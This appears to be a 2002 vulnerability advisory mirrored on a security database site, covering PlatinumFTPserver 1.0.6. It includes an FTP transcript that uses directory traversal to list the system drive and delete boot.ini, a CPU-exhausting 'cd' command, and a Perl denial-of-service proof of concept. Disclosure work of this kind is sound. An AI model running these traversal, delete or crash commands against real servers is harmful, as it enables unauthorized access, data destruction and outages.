Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:3922
HistoryDec 31, 2002 - 12:00 a.m.

Multiple vulnerabilities found in PlatinumFTPserver V1.0.6

2002-12-3100:00:00
vulners.com
9
JSON
                Multiple vulnerabilities found in 
                    PlatinumFTPserver V1.0.6
             PlatinumFTPserver (C)2002 BYTE/400 LTD
                                    
               Discovered by Dennis Rand - COWI A/S

SUMMARY

PlatinumFTPserver simplifies management of all your Ftp clients with regards
to sending and receiving program and data files over an IP connection.
Working within a control screen, PlatinumFTPserver gives you total
control: you can create and manage users, user groups and root directories.
You can define what Ftp Commands the users or groups can access.
PlatinumFTPserver provides activity logs, client connection details, file
and megabyte graphical statistics by session and day, virtual folders and a
built in Web Browser. The server engine runs as an application on Windows 9x
and a service under NT/2K/XP.
PlatinumFTPserver can bind to one or all IP addresses within the PC. All
configuration data for the server including password and description fields
are encrypted using the powerful Blowfish cipher. Clients can request files
be zipped before transfer, execute scripts created with the VBscript editor
and also access the shell process.
A vulnerability in the product allows remote attackers to cause
the server to traverse into directories that reside outside the bounding
FTP root directory, delete files and preform a DoS attack on the server.

DETAILS

Vulnerable systems:

  • PlatinumFTPServer version 1.0.6
    Also with installed patch released 14. dec. 2002

Immune systems:

  • PlatinumFTPServer version 1.x.x

PlatinumFTP failure to filter out "…\" sequences in command requests allows
remote users to break out of restricted directories and gain read access
to the system directory structure; Possibility for deleting files and preforming
a DoS attack on the server.

The following transcript demonstrates a sample exploitation of the
vulnerabilities:

C:\>ftp 192.168.1.199
Connected to 192.168.1.199.
220-PlatinumFTPserver V1.0.6
220-PlatinumFTPserver (C)2002 BYTE/400 LTD
220-
220 Enter login details
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230-Send comments to [email protected]
230-Date 12/30/02, Time 1:44:34 PM.
230 Storage available 1,954,179,072 Bytes.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> cd …
550 Access denied
ftp> dir …\…\…\…\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 279 Dec 23 12:16 boot.ini
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til
Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 13:43 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 13:23 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 30 13:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 13:55 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,00Seconds 1181000,00Kbytes/sec.
ftp> delete …\…\…\…\boot.ini
250 delete command successful.
ftp> dir …\…\…\…\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler til
Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 15:24 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 15:19 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 24 00:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 16:30 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> cd @/…@/…
ftp> bye
221 Goodbye.

Analysis:
1: DIR Command vulnerability
Any remote user with legitimate or anonymous access to an affected Platinum's
FTP server can exploit the vulnerability and freely browse the target
system's directory structure. Such information could prove useful in
subsequent attacks as well as provide information useful for an attacker
to successfully conduct social engineering attacks.

2: DELETE Command vulnerability
With this command it is possible to the attacker to destroy data on the server.
as you can see in the exploiting part it is fairly simple to do so.

3: CD Command vulnerability
The last command "cd @/…@/…" will cause a DoS attack on the server where
the server will use 99% og the CPU time.

Exploit code:
------------------------------------- CUT HERE

#!/usr/bin/perl

PlatinumFTPserver V1.0.6 DoS attack

http://www.PlatinumFTP.com

Dennis Rand - [email protected]

----------------------------------------------------------

Disclaimer: this file is intended as proof of concept, and

is not intended to be used for illegal purposes. I accept

no responsibility for damage incurred by the use of it.

----------------------------------------------------------

use Net::FTP;

$target = shift() || die "usage: target ip";
my $user = "anonymous";
my $pass = "crash\@burn.com";

system('cls');
print "PlatinumFTPserver V1.0.6 DoS attack\n";
print "Trying to connect to target system at: $target…\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect:
$!";
$ftp->login($user, $pass) || die "could not login: $!";
$ftp->cwd("/");

print "Trying to crash the FTP service…\n";
$ftp->cwd("cd @/…@/…");
$ftp->quit;

------------------------------------- CUT HERE

Detection:
PlatinumFTPServer version 1.0.6 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.

Vendor response:
PlatinumFTPServer version 1.x.x fixes this issue. The latest version is
available from http://www.platinumftp.com/platinumftpserver.php

Disclosure timeline:
12/30/2002 Found the Vulnerability.
12/30/2002 Author notified ([email protected])
xx/xx/2002 Responses received from [email protected]
xx/xx/2002 Public Disclosure.

ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:[email protected]> Dennis Rand

JSON